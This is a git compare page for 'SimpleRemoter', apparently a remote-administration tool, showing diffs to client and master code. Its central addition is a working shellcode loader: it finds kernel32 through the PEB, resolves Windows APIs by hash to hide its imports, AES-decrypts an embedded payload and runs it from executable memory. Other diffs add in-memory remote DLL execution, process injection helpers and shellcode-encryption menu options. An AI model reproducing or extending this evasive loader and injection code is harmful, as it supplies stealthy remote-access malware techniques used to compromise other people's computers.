admin/SimpleRemoter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: admin:v1.0.1.8
Branches Tags
admin:master admin:dev
admin:v1.0.1.8 admin:v1.0.1.7 admin:v1.0.1.6 admin:v1.0.1.5 admin:v1.0.1.4 admin:v1.0.1.3 admin:v1.0.1.2 admin:v1.0.1.1 admin:v1.0.1.0 admin:v1.0.0.9 admin:v1.0.0.8 admin:v1.0.0.7 admin:v1.0.0.6 admin:v1.0.0.5 admin:v1.0.0.4 admin:v1.0.0.3 admin:v1.0.0.2 admin:v1.0.0.1
...
compare: admin:master
Branches Tags
admin:master admin:dev
admin:v1.0.1.8 admin:v1.0.1.7 admin:v1.0.1.6 admin:v1.0.1.5 admin:v1.0.1.4 admin:v1.0.1.3 admin:v1.0.1.2 admin:v1.0.1.1 admin:v1.0.1.0 admin:v1.0.0.9 admin:v1.0.0.8 admin:v1.0.0.7 admin:v1.0.0.6 admin:v1.0.0.5 admin:v1.0.0.4 admin:v1.0.0.3 admin:v1.0.0.2 admin:v1.0.0.1

7 Commits
v1.0.1.8 ... master

Author SHA1 Message Date
yuanyuanxiang
9a640c0a1d Feature: Support recording video in remote desktop control 2025-11-23 21:02:03 +08:00
yuanyuanxiang
1e3aa8ff63 Fix: Open password gen dialog will modify max connection 2025-11-23 21:02:03 +08:00
yuanyuanxiang
e602a8a235 Fix: Viewing registry causing master program crash 2025-11-22 18:42:04 +08:00
yuanyuanxiang
a7d44439bf Feature: Add TinyRun.dll to client building option 2025-11-22 18:42:04 +08:00
yuanyuanxiang
a5f068b036 Improve: Add debug code for SCLoader 2025-11-22 18:42:04 +08:00
yuanyuanxiang
bd5f5f0547 Feature: Support anti black-screen in process management 2025-11-20 04:45:40 +08:00
yuanyuanxiang
cde6abb34d Improve: Modify client/SimpleSCLoader.c 2025-11-15 21:06:48 +01:00
28 changed files with 4056 additions and 254 deletions
Expand all files Collapse all files

2
client/KernelManager.cpp
View File

@@ -485,7 +485,6 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
break;
}
case CMD_EXECUTE_DLL: {
#ifdef _WIN64
static std::map<std::string, std::vector<BYTE>> m_MemDLL;
const int sz = 1 + sizeof(DllExecuteInfo);
if (ulLength < sz)break;
@@ -525,7 +524,6 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data), 0, NULL));
Mprintf("Execute '%s'%d succeed - Length: %d\n", info->Name, info->CallType, info->Size);
}
#endif
break;
}

30
client/RegisterOperation.cpp
View File

@@ -72,10 +72,10 @@ char* RegisterOperation::FindPath()
/*<2A><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD> User kdjfjkf\kdjfkdjf\ */
if(RegOpenKeyEx(MKEY,KeyPath,0,KEY_ALL_ACCESS,&hKey)==ERROR_SUCCESS) { //<2F><><EFBFBD><EFBFBD>
DWORD dwIndex=0,NameCount,NameMaxLen;
DWORD KeySize,KeyCount,KeyMaxLen,MaxDateLen;
DWORD KeySize,KeyCount,KeyMaxLen,MaxDataLen;
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ö<EFBFBD><C3B6><EFBFBD><EFBFBD>
if(RegQueryInfoKey(hKey,NULL,NULL,NULL,&KeyCount, //14
&KeyMaxLen,NULL,&NameCount,&NameMaxLen,&MaxDateLen,NULL,NULL)!=ERROR_SUCCESS) {
&KeyMaxLen,NULL,&NameCount,&NameMaxLen,&MaxDataLen,NULL,NULL)!=ERROR_SUCCESS) {
return NULL;
}
//һ<><EFBFBD><E3B1A3><EFBFBD><EFBFBD>ʩ
@@ -120,26 +120,26 @@ void RegisterOperation::SetPath(char *szPath)
char* RegisterOperation::FindKey()
{
char *szValueName; //<2F><>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD>
LPBYTE szValueDate; //<2F><>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD>
LPBYTE szValueData; //<2F><>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD>
char *szBuffer=NULL;
HKEY hKey; //ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ؾ<EFBFBD><D8BE><EFBFBD>
if(RegOpenKeyEx(MKEY,KeyPath,0,KEY_ALL_ACCESS,&hKey)==ERROR_SUCCESS) { //<2F><><EFBFBD><EFBFBD>
DWORD dwIndex=0,NameSize,NameCount,NameMaxLen,Type;
DWORD KeyCount,KeyMaxLen,DataSize,MaxDateLen;
DWORD KeyCount,KeyMaxLen,DataSize,MaxDataLen;
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ö<EFBFBD><C3B6><EFBFBD><EFBFBD>
if(RegQueryInfoKey(hKey,NULL,NULL,NULL,
&KeyCount,&KeyMaxLen,NULL,&NameCount,&NameMaxLen,&MaxDateLen,NULL,NULL)!=ERROR_SUCCESS) {
&KeyCount,&KeyMaxLen,NULL,&NameCount,&NameMaxLen,&MaxDataLen,NULL,NULL)!=ERROR_SUCCESS) {
return NULL;
}
if(NameCount>0&&MaxDateLen>0) {
DataSize=MaxDateLen+1;
if(NameCount>0&&MaxDataLen>0) {
DataSize=MaxDataLen+1;
NameSize=NameMaxLen+100;
REGMSG msg;
msg.count=NameCount; //<2F>ܸ<EFBFBD><DCB8><EFBFBD>
msg.size=NameSize; //<2F><><EFBFBD>ִ<EFBFBD>С
msg.valsize=DataSize; //<2F><><EFBFBD>ݴ<EFBFBD>С
int msgsize=sizeof(REGMSG);
const int msgsize=sizeof(REGMSG);
// ͷ <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
DWORD size=sizeof(REGMSG)+
sizeof(BYTE)*NameCount+ NameSize*NameCount+DataSize*NameCount+10;
@@ -152,20 +152,20 @@ char* RegisterOperation::FindKey()
memcpy(szBuffer+1,(void*)&msg,msgsize); //<2F><><EFBFBD><EFBFBD>ͷ
szValueName=(char *)malloc(NameSize);
szValueDate=(LPBYTE)malloc(DataSize);
if (szValueName==NULL||szValueDate == NULL) {
szValueData=(LPBYTE)malloc(DataSize);
if (szValueName==NULL||szValueData == NULL) {
return NULL;
}
char *szTemp=szBuffer+msgsize+1;
for(dwIndex=0; dwIndex<NameCount; dwIndex++) { //ö<>ټ<EFBFBD>ֵ
ZeroMemory(szValueName,NameSize);
ZeroMemory(szValueDate,DataSize);
ZeroMemory(szValueData,DataSize);
DataSize=MaxDateLen+1;
DataSize=MaxDataLen+1;
NameSize=NameMaxLen+100;
RegEnumValue(hKey,dwIndex,szValueName,&NameSize,
NULL,&Type,szValueDate,&DataSize);//<2F><>ȡ<EFBFBD><C8A1>ֵ
NULL,&Type,szValueData,&DataSize);//<2F><>ȡ<EFBFBD><C8A1>ֵ
if(Type==REG_SZ) {
szTemp[0]=MREG_SZ;
@@ -182,11 +182,11 @@ char* RegisterOperation::FindKey()
szTemp+=sizeof(BYTE);
strcpy(szTemp,szValueName);
szTemp+=msg.size;
memcpy(szTemp,szValueDate,msg.valsize);
memcpy(szTemp,szValueData,msg.valsize);
szTemp+=msg.valsize;
}
free(szValueName);
free(szValueDate);
free(szValueData);
}
}
return szBuffer;

10
client/SCLoader.vcxproj
View File

@@ -97,6 +97,7 @@
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>mainCRTStartup</EntryPointSymbol>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
@@ -113,8 +114,8 @@
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>mainCRTStartup</EntryPointSymbol>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EntryPointSymbol>entry</EntryPointSymbol>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@@ -128,6 +129,7 @@
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>mainCRTStartup</EntryPointSymbol>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@@ -144,8 +146,8 @@
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>mainCRTStartup</EntryPointSymbol>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EntryPointSymbol>entry</EntryPointSymbol>
</Link>
</ItemDefinitionGroup>
<ItemGroup>

64
client/ShellcodeInj.h
View File

@@ -55,6 +55,44 @@ public:
return m_buffer ? InjectShellcode(pid, (BYTE*)m_buffer, m_length, m_userFunction, m_userData, m_userLength) : false;
}
// Check if the process is 64bit.
static bool IsProcess64Bit(HANDLE hProcess, BOOL& is64Bit)
{
is64Bit = FALSE;
BOOL bWow64 = FALSE;
typedef BOOL(WINAPI* LPFN_ISWOW64PROCESS2)(HANDLE, USHORT*, USHORT*);
HMODULE hKernel = GetModuleHandleA("kernel32.dll");
LPFN_ISWOW64PROCESS2 fnIsWow64Process2 = hKernel ?
(LPFN_ISWOW64PROCESS2)::GetProcAddress(hKernel, "IsWow64Process2") : nullptr;
if (fnIsWow64Process2) {
USHORT processMachine = 0, nativeMachine = 0;
if (fnIsWow64Process2(hProcess, &processMachine, &nativeMachine)) {
is64Bit = (processMachine == IMAGE_FILE_MACHINE_UNKNOWN) &&
(nativeMachine == IMAGE_FILE_MACHINE_AMD64 || nativeMachine == IMAGE_FILE_MACHINE_ARM64);
return true;
}
}
else {
// Old system use IsWow64Process
if (IsWow64Process(hProcess, &bWow64)) {
if (bWow64) {
is64Bit = FALSE; // WOW64 <20><> һ<><D2BB><EFBFBD><EFBFBD> 32 λ
}
else {
#ifdef _WIN64
is64Bit = TRUE; // 64 λ<><CEBB><EFBFBD>򲻻<EFBFBD><F2B2BBBB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 32 λϵͳ <20><> Ŀ<><C4BF>һ<EFBFBD><D2BB><EFBFBD><EFBFBD>64λ
#else
is64Bit = FALSE; // 32 λ<><CEBB><EFBFBD><EFBFBD><EFBFBD>޷<EFBFBD><DEB7>ж<EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD>Ƿ<EFBFBD>64λ <20><> <20><><EFBFBD><EFBFBD>Ϊfalse
#endif
}
return true;
}
}
return false;
}
private:
BYTE* m_buffer = NULL;
int m_length = 0;
@@ -125,32 +163,6 @@ private:
return pid;
}
// Check if the process is 64bit.
bool IsProcess64Bit(HANDLE hProcess, BOOL& is64Bit)
{
BOOL bWow64 = FALSE;
typedef BOOL(WINAPI* LPFN_ISWOW64PROCESS2)(HANDLE, USHORT*, USHORT*);
HMODULE hKernel = GetModuleHandleA("kernel32.dll");
LPFN_ISWOW64PROCESS2 fnIsWow64Process2 = hKernel ?
(LPFN_ISWOW64PROCESS2)::GetProcAddress(hKernel, "IsWow64Process2") : nullptr;
if (fnIsWow64Process2) {
USHORT processMachine = 0, nativeMachine = 0;
if (fnIsWow64Process2(hProcess, &processMachine, &nativeMachine)) {
is64Bit = (processMachine == IMAGE_FILE_MACHINE_UNKNOWN) && (nativeMachine == IMAGE_FILE_MACHINE_AMD64);
return true;
}
} else {
// Old system use IsWow64Process
if (IsWow64Process(hProcess, &bWow64)) {
is64Bit = sizeof(void*) == 8 ? TRUE : !bWow64;
return true;
}
}
return false;
}
// Check if it's able to inject.
HANDLE CheckProcess(DWORD pid)
{

241
client/SimpleSCLoader.c
View File

@@ -1,5 +1,4 @@
#include <windows.h>
#include <stdio.h>
#include "../common/aes.h"
struct {
@@ -9,24 +8,244 @@ struct {
int len;
} sc = { "Hello, World!" };
#define Kernel32Lib_Hash 0x1cca9ce6
#define GetProcAddress_Hash 0x1AB9B854
typedef void* (WINAPI* _GetProcAddress)(HMODULE hModule, char* funcName);
#define LoadLibraryA_Hash 0x7F201F78
typedef HMODULE(WINAPI* _LoadLibraryA)(LPCSTR lpLibFileName);
#define VirtualAlloc_Hash 0x5E893462
typedef LPVOID(WINAPI* _VirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
#define VirtualProtect_Hash 1819198468
typedef BOOL(WINAPI* _VirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
#define Sleep_Hash 1065713747
typedef VOID(WINAPI* _Sleep)(DWORD dwMilliseconds);
typedef struct _UNICODE_STR {
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, * PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
typedef struct _LDR_DATA_TABLE_ENTRY {
// LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first
// entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDataStamp;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA { //, 7 elements, 0x28 bytes
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK { // 2 elements, 0x8 bytes
struct _PEB_FREE_BLOCK* pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB { // 65 elements, 0x210 bytes
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
// BKDRHash
inline uint32_t calc_hash(const char* str)
{
uint32_t seed = 131; // 31 131 1313 13131 131313 etc..
uint32_t hash = 0;
while (*str) {
hash = hash * seed + (*str++);
}
return (hash & 0x7FFFFFFF);
}
inline uint32_t calc_hashW2(const wchar_t* str, int len)
{
uint32_t seed = 131; // 31 131 1313 13131 131313 etc..
uint32_t hash = 0;
for (int i = 0; i < len; ++i) {
wchar_t s = *str++;
if (s >= 'a') s = s - 0x20;
hash = hash * seed + s;
}
return (hash & 0x7FFFFFFF);
}
inline HMODULE get_kernel32_base()
{
_PPEB peb = NULL;
#ifdef _WIN64
peb = (_PPEB)__readgsqword(0x60);
#else
peb = (_PPEB)__readfsdword(0x30);
#endif
LIST_ENTRY* entry = peb->pLdr->InMemoryOrderModuleList.Flink;
while (entry) {
PLDR_DATA_TABLE_ENTRY e = (PLDR_DATA_TABLE_ENTRY)entry;
if (calc_hashW2(e->BaseDllName.pBuffer, e->BaseDllName.Length / 2) == Kernel32Lib_Hash) {
return (HMODULE)e->DllBase;
}
entry = entry->Flink;
}
return 0;
};
#define cast(t, a) ((t)(a))
#define cast_offset(t, p, o) ((t)((uint8_t *)(p) + (o)))
void* get_proc_address_from_hash(HMODULE module, uint32_t func_hash, _GetProcAddress get_proc_address)
{
PIMAGE_DOS_HEADER dosh = cast(PIMAGE_DOS_HEADER, module);
PIMAGE_NT_HEADERS nth = cast_offset(PIMAGE_NT_HEADERS, module, dosh->e_lfanew);
PIMAGE_DATA_DIRECTORY dataDict = &nth->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (dataDict->VirtualAddress == 0 || dataDict->Size == 0) return 0;
PIMAGE_EXPORT_DIRECTORY exportDict = cast_offset(PIMAGE_EXPORT_DIRECTORY, module, dataDict->VirtualAddress);
if (exportDict->NumberOfNames == 0) return 0;
uint32_t* fn = cast_offset(uint32_t*, module, exportDict->AddressOfNames);
uint32_t* fa = cast_offset(uint32_t*, module, exportDict->AddressOfFunctions);
uint16_t* ord = cast_offset(uint16_t*, module, exportDict->AddressOfNameOrdinals);
for (uint32_t i = 0; i < exportDict->NumberOfNames; i++) {
char* name = cast_offset(char*, module, fn[i]);
uint32_t hash = calc_hash(name);
if (hash != func_hash) continue;
return get_proc_address == 0 ? cast_offset(void*, module, fa[ord[i]]) : get_proc_address(module, name);
}
return 0;
}
inline void* mc(void* dest, const void* src, size_t n) {
char* d = (char*)dest;
const char* s = (const char*)src;
while (n--)
*d++ = *s++;
return dest;
}
// A simple shell code loader.
// Copy left (c) yuanyuanxiang.
int main()
{
if (!sc.data[0] || !sc.len)
#ifdef _DEBUG
// Tip: Use menu to generate TinyRun.c.
#ifdef _WIN64
#include "../x64/Release/TinyRun.c"
#else
#include "../Release/TinyRun.c"
#endif
int main(){
sc.len = Shellcode_len;
if (sc.len > sizeof(sc.data)) return -1;
memcpy(sc.data, Shellcode, sc.len);
memcpy(sc.aes_iv, "It is a example", 16);
memcpy(sc.aes_key, "It is a example", 16);
#else
int entry(){
#endif
if (!sc.data[0] || !sc.len)
return -1;
for (int i = 0; i < 16; ++i) printf("%d ", sc.aes_key[i]);
printf("\n\n");
for (int i = 0; i < 16; ++i) printf("%d ", sc.aes_iv[i]);
printf("\n\n");
struct AES_ctx ctx;
AES_init_ctx_iv(&ctx, sc.aes_key, sc.aes_iv);
AES_CBC_decrypt_buffer(&ctx, sc.data, sc.len);
void* exec = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
HMODULE kernel32 = get_kernel32_base();
if (!kernel32) return -2;
_GetProcAddress GetProcAddress = (_GetProcAddress)get_proc_address_from_hash(kernel32, GetProcAddress_Hash, 0);
_LoadLibraryA LoadLibraryA = (_LoadLibraryA)get_proc_address_from_hash(kernel32, LoadLibraryA_Hash, GetProcAddress);
_VirtualAlloc VirtualAlloc = (_VirtualAlloc)get_proc_address_from_hash(kernel32, VirtualAlloc_Hash, GetProcAddress);
_VirtualProtect VirtualProtect = (_VirtualProtect)get_proc_address_from_hash(kernel32, VirtualProtect_Hash, GetProcAddress);
_Sleep Sleep = (_Sleep)get_proc_address_from_hash(kernel32, Sleep_Hash, GetProcAddress);
void* exec = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (exec) {
memcpy(exec, sc.data, sc.len);
mc(exec, sc.data, sc.len);
DWORD oldProtect = 0;
if (!VirtualProtect(exec, sc.len, PAGE_EXECUTE_READ, &oldProtect)) return -3;
((void(*)())exec)();
Sleep(INFINITE);
}

13
client/SystemManager.cpp
View File

@@ -13,6 +13,7 @@
#endif
#include <Psapi.h>
#include "ShellcodeInj.h"
#pragma comment(lib,"psapi.lib")
@@ -91,11 +92,15 @@ LPBYTE CSystemManager::GetProcessList()
if (dwReturn==0) {
strcpy(szProcessFullPath,"");
}
BOOL is64Bit;
ShellcodeInj::IsProcess64Bit(hProcess, is64Bit);
const char* arch = is64Bit ? "x64" : "x86";
char exeFile[300];
sprintf(exeFile, "%s:%s", pe32.szExeFile, arch);
//<2F><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD>ռ<EFBFBD>õĻ<C3B5><C4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ǹ<EFBFBD><C7B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ķ<EFBFBD><C4B7>͵<EFBFBD><CDB5><EFBFBD><EFBFBD>ݽṹ
// <20>˽<EFBFBD><CBBD><EFBFBD>ռ<EFBFBD><D5BC><EFBFBD><EFBFBD><EFBFBD>ݴ<EFBFBD>С
dwLength = sizeof(DWORD) +
lstrlen(pe32.szExeFile) + lstrlen(szProcessFullPath) + 2;
lstrlen(exeFile) + lstrlen(szProcessFullPath) + 2;
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<CCAB><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>
if (LocalSize(szBuffer) < (dwOffset + dwLength))
szBuffer = (LPBYTE)LocalReAlloc(szBuffer, (dwOffset + dwLength),
@@ -107,8 +112,8 @@ LPBYTE CSystemManager::GetProcessList()
memcpy(szBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
dwOffset += sizeof(DWORD);
memcpy(szBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1);
dwOffset += lstrlen(pe32.szExeFile) + 1;
memcpy(szBuffer + dwOffset, exeFile, lstrlen(exeFile) + 1);
dwOffset += lstrlen(exeFile) + 1;
memcpy(szBuffer + dwOffset, szProcessFullPath, lstrlen(szProcessFullPath) + 1);
dwOffset += lstrlen(szProcessFullPath) + 1;

22
client/main.c
View File

@@ -44,7 +44,7 @@ struct CONNECT_ADDRESS {
uint64_t parentHwnd; // 父进程窗口句柄
uint64_t superAdmin; // 管理员主控ID
char pwdHash[64]; // 密码哈希
} g_Server = { "Hello, World!", "127.0.0.1", "6543" };
} g_Server = { "Hello, World!", "127.0.0.1", "6543", 0, 0, __DATE__ };
#pragma pack(pop)
typedef struct PluginParam {
@@ -404,18 +404,22 @@ extern DLL_API DWORD WINAPI run(LPVOID param)
return 0;
}
extern DLL_API void Run(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
assert(sizeof(struct CONNECT_ADDRESS) == 300);
PluginParam param = { 0 };
strcpy(param.IP, g_Server.szServerIP);
param.Port = atoi(g_Server.szPort);
param.User = g_Server.pwdHash;
DWORD result = run(&param);
Sleep(INFINITE);
}
#ifndef _WINDLL
int main()
{
assert(sizeof(struct CONNECT_ADDRESS) == 300);
PluginParam param = { 0 };
strcpy(param.IP, g_Server.szServerIP);
param.Port = atoi(g_Server.szPort);
param.User = g_Server.pwdHash;
DWORD result = run(&param);
Sleep(INFINITE);
return result;
Run(0, 0, 0, 0);
return 0;
}
#else

11
common/commands.h
View File

@@ -889,7 +889,8 @@ typedef struct DllExecuteInfo {
char Name[32]; // DLL <20><><EFBFBD><EFBFBD>
char Md5[33]; // DLL MD5
int Pid; // <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ID
char Reseverd[19];
char Is32Bit; // <20>Ƿ<EFBFBD>32λDLL
char Reseverd[18];
} DllExecuteInfo;
#pragma pack(pop)
@@ -961,6 +962,14 @@ inline std::string ToPekingTimeAsString(const time_t* t)
return buffer;
}
inline std::string ToPekingDateTime(const time_t* t)
{
auto pekingTime = ToPekingTime(t);
char buffer[20];
std::strftime(buffer, sizeof(buffer), "%Y%m%d%H%M%S", &pekingTime);
return buffer;
}
typedef struct Validation {
char From[20]; // <20><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD>
char To[20]; // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

2809
common/turbojpeg.h Normal file
View File

File diff suppressed because it is too large Load Diff

BIN
server/2015Remote/2015Remote.rc
View File

Binary file not shown.

78
server/2015Remote/2015RemoteDlg.cpp
View File

@@ -53,6 +53,7 @@
#define TIMER_CHECK 1
#define TIMER_CLOSEWND 2
#define TODO_NOTICE MessageBoxA("This feature has not been implemented!\nPlease contact: 962914132@qq.com", "提示", MB_ICONINFORMATION);
#define TINY_DLL_NAME "TinyRun.dll"
typedef struct {
const char* szTitle; //列表的名称
@@ -101,6 +102,13 @@ std::string EventName()
snprintf(eventName, sizeof(eventName), "EVENT_%d", GetCurrentProcessId());
return eventName;
}
std::string PluginPath() {
char path[_MAX_PATH];
GetModuleFileNameA(NULL, path, _MAX_PATH);
GET_FILEPATH(path, "Plugins");
return path;
}
//////////////////////////////////////////////////////////////////////////
@@ -233,7 +241,7 @@ bool IsDll64Bit(BYTE* dllBase)
}
// 返回:读取的字节数组指针(需要手动释放)
DllInfo* ReadPluginDll(const std::string& filename)
DllInfo* ReadPluginDll(const std::string& filename, const DllExecuteInfo & execInfo = { MEMORYDLL, 0, CALLTYPE_IOCPTHREAD })
{
// 打开文件(以二进制模式)
std::ifstream file(filename, std::ios::binary | std::ios::ate);
@@ -255,11 +263,6 @@ DllInfo* ReadPluginDll(const std::string& filename)
delete[] buffer;
return nullptr;
}
if (!IsDll64Bit(dllData)) {
Mprintf("不支持32位DLL: %s\n", filename.c_str());
delete[] buffer;
return nullptr;
}
std::string masterHash(GetMasterHash());
int offset = MemoryFind((char*)dllData, masterHash.c_str(), fileSize, masterHash.length());
if (offset != -1) {
@@ -271,7 +274,9 @@ DllInfo* ReadPluginDll(const std::string& filename)
// 设置输出参数
auto md5 = CalcMD5FromBytes(dllData, fileSize);
DllExecuteInfo info = { MEMORYDLL, fileSize, CALLTYPE_IOCPTHREAD, };
DllExecuteInfo info = execInfo;
info.Size = fileSize;
info.Is32Bit = !IsDll64Bit(dllData);
memcpy(info.Name, name.c_str(), name.length());
memcpy(info.Md5, md5.c_str(), md5.length());
buffer[0] = CMD_EXECUTE_DLL;
@@ -282,7 +287,7 @@ DllInfo* ReadPluginDll(const std::string& filename)
}
DllInfo* ReadTinyRunDll(int pid) {
std::string name = "TinyRun.dll";
std::string name = TINY_DLL_NAME;
DWORD fileSize = 0;
BYTE * dllData = ReadResource(IDR_TINYRUN_X64, fileSize);
// 设置输出参数
@@ -477,6 +482,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
ON_MESSAGE(WM_SHOWMESSAGE, OnShowMessage)
ON_MESSAGE(WM_SHOWERRORMSG, OnShowErrMessage)
ON_MESSAGE(WM_INJECT_SHELLCODE, InjectShellcode)
ON_MESSAGE(WM_ANTI_BLACKSCREEN, AntiBlackScreen)
ON_MESSAGE(WM_SHARE_CLIENT, ShareClient)
ON_MESSAGE(WM_ASSIGN_CLIENT, AssignClient)
ON_MESSAGE(WM_ASSIGN_ALLCLIENT, AssignAllClient)
@@ -527,6 +533,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
ON_COMMAND(ID_SHELLCODE_AES_BIN, &CMy2015RemoteDlg::OnShellcodeAesBin)
ON_COMMAND(ID_SHELLCODE_TEST_AES_BIN, &CMy2015RemoteDlg::OnShellcodeTestAesBin)
ON_COMMAND(ID_TOOL_RELOAD_PLUGINS, &CMy2015RemoteDlg::OnToolReloadPlugins)
ON_COMMAND(ID_SHELLCODE_AES_C_ARRAY, &CMy2015RemoteDlg::OnShellcodeAesCArray)
END_MESSAGE_MAP()
@@ -563,7 +570,7 @@ VOID CMy2015RemoteDlg::CreateSolidMenu()
m_MainMenu.LoadMenu(IDR_MENU_MAIN);
CMenu* SubMenu = m_MainMenu.GetSubMenu(1);
std::string masterHash(GetMasterHash());
if (GetPwdHash() != masterHash || m_superPass.empty()) {
